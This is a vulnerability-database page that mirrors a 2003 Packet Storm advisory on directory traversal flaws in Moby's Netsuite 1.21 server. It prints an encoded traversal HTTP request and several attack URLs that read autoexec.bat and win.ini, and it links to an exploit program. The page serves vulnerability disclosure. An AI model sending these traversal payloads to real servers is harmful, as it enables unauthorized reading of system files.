Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Netsuite121.txt

🗓️ 15 Jul 2003 00:00:00Reported by Dr. InsaneType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

Moby's Netsuite 1.21 has directory traversal bugs allowing unauthorized file access.

Code
`  
Moby's Netsuite 1.21 Traversal Directory bugs  
  
  
Release Date:  
13 July, 2003  
  
  
Description:  
NetSuite is a freeware server suite that allows anyone with a static IP address the ability to run their own mail and web services. Note that you cannot reasonably run a web server from a normal dial-in account.   
Netsuite is designed for complete simplicity -- requiring only a few minutes to setup with no prior network skills or experience, and requires virtually no memory or processor time. General Windows file management and an understanding of the Internet is required. There are two sections: Moby Mail and Moby Web. Both are very direct to install and use, requiring only few minutes to begin using. Full source code for Microsoft Visual C++ 6.0 is available on the web.   
  
There exists some directory traversal vulnerabilities that allow someone to download or read  
files outside the web folder. In order for this attack to work we have to use some HTML characters instead of normal one.  
  
  
The attack:  
  
GET / HTTP/1.1  
Host: /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat  
  
In our example above we want to see the file autoexec.bat.  
***The folder /error/ doesn't exist in my Pc:P ehhe  
  
Other attack strings: http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin.ini  
http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin%2eini  
http://127.0.0.1/\..\..\..\windows\win.ini  
While i was searching i found about 25 attack string.This is only a small sample above.  
  
  
The Attack Program:  
I have created a sample attack program for Moby's Netsuite 1.21(possibly it for all versions of Moby's Netsuite ). You can get it from here:   
http://members.lycos.co.uk/r34ct/main/Netsuite_expl/  
  
  
Disclaimer  
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.  
  
  
Feedback  
Please send suggestions, updates, and comments to:  
Dr_insane  
[email protected]  
http://members.lycos.co.uk/r34ct/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Jul 2003 00:00Current
7.4High risk
Vulners AI Score7.4
directory traversal vulnerabilitiesmoby mailmoby webattack stringssample attack programfreeware server
24